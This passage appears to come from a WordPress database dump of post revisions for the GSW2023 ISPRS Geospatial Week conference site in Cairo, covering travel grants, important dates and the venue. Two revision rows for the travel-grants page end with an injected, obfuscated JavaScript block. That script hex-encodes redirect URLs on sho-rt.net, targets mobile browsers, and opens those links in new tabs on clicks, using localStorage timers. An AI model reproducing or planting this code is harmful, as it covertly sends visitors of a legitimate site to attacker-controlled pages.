)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-02-02 10:38:02','2023-02-02 10:38:02','',2665,'https://gsw2023.com/?p=3722',0,'revision','',0),
(3723,1,'2023-02-02 10:42:06','2023-02-02 10:42:06','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]</p>\n<h4 class=\"three_quarter first\"><strong>The</strong> <a href=\"http://www.isprs.org/foundation/Default.aspx\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/Default.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw2DdHpz5ihNqqTyfv-q8_ze\">ISPRS Foundation</a> <strong>provides travel grants to enable young authors, distinguished speakers, and officially designated Delegates, especially from developing countries, to participate in ISPRS sponsored events and in forums promoting international cooperation, advancements and benefits of the P&amp;RS&amp;SI sciences.</strong></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<ul style=\"font-weight: 400;\">\n<li><strong>Click</strong> <strong><a href=\"http://www.isprs.org/foundation/forms/Travel_Grants.aspx\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/forms/Travel_Grants.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw19PJGKqfwxDGKh2VuKF0d6\">here</a></strong> <strong>to complete your travel grant application online</strong></li>\n</ul>\n<h5 style=\"font-weight: 400;\"></h5>\n<h4 style=\"font-weight: 400;\"><strong>Important Dates</strong></h4>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul style=\"font-weight: 400;\">\n<li>\n<h4>Applications for travel grants “live” on TIF website: March 15, 2023</h4>\n</li>\n<li>\n<h4>Deadline for submission of travel grant applications: May 18, 2023</h4>\n</li>\n<li>\n<h4>Decision &amp; notification of successful applicants: June 3, 2023</h4>\n</li>\n<li>\n<h4>Notification of acceptance of travel grant to TIF: July 3, 2023</h4>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-02-02 10:42:06','2023-02-02 10:42:06','',2665,'https://gsw2023.com/?p=3723',0,'revision','',0),
(3724,1,'2023-02-03 04:18:17','2023-02-03 04:18:17','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): 31 March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: 1 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): 15 April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1673292178000{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 